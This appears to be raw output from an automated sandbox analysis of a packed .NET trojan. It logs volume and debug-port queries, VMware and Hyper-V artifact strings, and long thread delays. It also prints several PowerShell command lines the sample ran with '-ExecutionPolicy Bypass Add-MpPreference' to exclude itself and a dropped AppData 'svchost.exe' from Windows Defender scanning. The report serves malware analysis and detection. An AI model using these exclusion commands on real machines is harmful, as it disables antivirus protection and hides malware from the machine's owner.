              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\svchost.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\svchost.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
              Source: Amcache.hve.26.drBinary or memory string: VMware
              Source: Amcache.hve.26.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.26.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.26.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.26.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.26.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.26.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.26.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
              Source: Amcache.hve.26.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.26.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005B76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrviceModel.Channels.ContextBindingElementImporter, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
              Source: Amcache.hve.26.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.26.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.26.drBinary or memory string: vmci.sys
              Source: Amcache.hve.26.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.26.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.26.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.26.drBinary or memory string: VMware20,1
              Source: Amcache.hve.26.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.26.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.26.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.26.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.26.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.26.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.26.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.26.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.26.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.26.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1436 -ip 1436
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 2424
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
